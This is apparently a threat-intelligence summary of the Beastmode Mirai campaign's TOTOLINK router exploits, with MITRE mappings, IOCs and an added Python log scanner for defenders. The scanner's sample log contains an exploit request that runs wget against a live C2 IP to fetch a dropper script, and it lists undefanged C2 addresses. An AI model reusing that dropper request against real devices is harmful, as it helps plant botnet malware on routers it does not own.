Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign

Beastmode, a Mirai-based DDoS campaign, rapidly expanded its exploit arsenal in early 2022 by adding multiple TOTOLINK-focused vulnerabilities, enabling broader device infections and botnet growth. The campaign leverages publicly released exploit code, uses shell scripts downloaded via wget, and culminates in a suite of DDoS capabilities; users are urged to update affected firmware. #Beastmode #Totolink

Keypoints

  • Beastmode (aka B3astmode) added five new exploits within a month in early 2022, with three targeting TOTOLINK router models.
  • Threat actors rapidly adopted newly released exploit code (often within a week of GitHub publication) to infect more devices before patches appeared.
  • TOTOLINK updated firmware; users are strongly advised to apply updates to mitigate risk.
  • Exploited CVEs include CVE-2022-26210; CVE-2022-25075/25076/25077/25078/25079/25080/25081/25082/25083/25084, plus other older CVEs (e.g., CVE-2021-45382, CVE-2021-4045, CVE-2017-17215, CVE-2016-5674).
  • The campaign uses wget to download and execute shell scripts (e.g., ddns.sh) to install Beastmode on breached devices.
  • Beastmode botnets can execute a variety of DDoS attacks (e.g., attack_app_http, attack_tcp_syn, attack_udp_plain, etc.).
  • Fortinet protections include IPS signatures, web filtering for C2s, and AV detection as Linux/Mirai, helping to block these threats.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Five new exploits were added within a month, with three targeting various models of TOTOLINK routers. "By rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and expand their botnets before patches are applied to fix these vulnerabilities."
  • [T1105] Ingress Tool Transfer – This usually involves using the wget command to download shell scripts to infect the device with Beastmode.
  • [T1059.004] Unix Shell – The downloaded shell scripts are then executed, with the Beastmode binary saved as "ddns" and run with the "ddns.exploit" parameter.
  • [T1071.001] Web Protocols – The campaign uses an HTTP User-Agent header "b3astmode" within exploit requests, indicating HTTP-based C2/command actions.
  • [T1499] Denial of Service – The botnet can be used to perform a variety of DDoS attacks such as attack_app_http, attack_tcp_syn, attack_udp_plain, etc.
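The T1190/T1105/T1071.001 behaviours above translate directly into a log-based detection: exploit requests carry the "b3astmode" User-Agent and embed a wget fetch of the dropper script from the campaign's download/C2 hosts. The script below is an added example (not Fortinet's code or the campaign's) that parses combined-format HTTP access logs and flags entries matching those indicators. The log lines, the request endpoint name and the ddns.sh download URL in the sample are constructed placeholders; only the User-Agent string, the two IPs and the /beastmode/ path prefix come from the write-up.

```python
"""Flag Beastmode (B3astmode) indicators in HTTP access-log lines.

Indicators taken from the write-up: the "b3astmode" User-Agent used in exploit
requests, the download/C2 IPs, and the /beastmode/ download path prefix.
"""
import re
from typing import Optional
from urllib.parse import unquote

BEASTMODE_USER_AGENT = "b3astmode"                  # from the write-up (T1071.001)
KNOWN_C2_IPS = {"195.133.18.119", "136.144.41.69"}  # from the write-up (defanged there)
DOWNLOAD_PATH_PREFIX = "/beastmode/"                # from the write-up's download URLs

# Apache/nginx "combined" log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry: dict) -> list:
    """Return the names of the indicators matched by one parsed entry."""
    reasons = []
    if BEASTMODE_USER_AGENT in entry["ua"].lower():
        reasons.append("beastmode_user_agent")
    # Exploit requests carry a URL-encoded shell command (T1105: wget of the
    # dropper). Decode twice so a double-encoded payload is still searched.
    decoded = unquote(unquote(entry["path"]))
    if "wget" in decoded.lower():
        hit = next((ip for ip in KNOWN_C2_IPS if ip in decoded), None)
        reasons.append(f"wget_from_known_c2:{hit}" if hit else "wget_in_request")
    # Relevant when the monitored host itself is being used to serve payloads.
    if entry["path"].startswith(DOWNLOAD_PATH_PREFIX):
        reasons.append("beastmode_download_path")
    return reasons


def scan(lines) -> list:
    """Run classify() over an iterable of log lines and collect alerts."""
    alerts = []
    for n, line in enumerate(lines, 1):
        entry = parse_line(line)
        if entry is None:
            continue  # unparseable line: skip rather than fail the whole scan
        reasons = classify(entry)
        if reasons:
            alerts.append({"line": n, "client": entry["client"],
                           "path": entry["path"], "reasons": reasons})
    return alerts


# Constructed sample log (not real traffic). EXAMPLE_ENDPOINT and the ddns.sh
# URL are placeholders; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Apr/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Apr/2022:10:00:02 +0000] "GET /cgi-bin/EXAMPLE_ENDPOINT?cmd=wget%20http%3A%2F%2F195.133.18.119%2Fbeastmode%2Fddns.sh HTTP/1.1" 200 0 "-" "b3astmode"',
    '203.0.113.7 - - [01/Apr/2022:10:00:03 +0000] "GET /cgi-bin/EXAMPLE_ENDPOINT?cmd=wget%20http%3A%2F%2F198.51.100.9%2Fx.sh HTTP/1.1" 200 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [01/Apr/2022:10:00:04 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"line {alert['line']}: {alert['client']} -> {', '.join(alert['reasons'])}")
```

The generic "wget_in_request" reason is deliberately kept separate from the C2-specific match: once the campaign rotates download hosts, the IP list goes stale, but an HTTP request that embeds a wget command is still worth a look on any router management interface.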

Indicators of Compromise

  • [URL] Download URLs – http://195.133.18[.]119/beastmode/b3astmode.86_64, http://195.133.18[.]119/beastmode/b3astmode.arm4
  • [URL] Download URLs – http://195.133.18[.]119/beastmode/b3astmode.arm5, http://195.133.18[.]119/beastmode/b3astmode.arm6
  • [IP] C2 IPs – 195.133.18[.]119, 136.144.41[.]69
  • [SHA256] Samples – 04a50c409a30cdd53036c490534ee7859b828f2b9a9dd779c6b0112b88b74708, 0ca74024f5b389fcfa5ee545c8a7842316c78fc53d4a9e94c34d556459a58877
  • [SHA256] Samples – 0d442f4327ddd254dbb2a9a243d9317313e44d4f6a6078ea1139ddd945c3f272, 14726d501dd489e8228af9580b4369819efb3101f6128df1a1ab0fcc8d96e797
  • [SHA256] Samples – 18cefe4333f5f1165c1275c956c8ae717d53818b2c5b2372144fb87d6687f0d8, 36a85f2704f77d7e11976541f3d77774109461e1baae984beb83064c2e34239a

Read more: https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign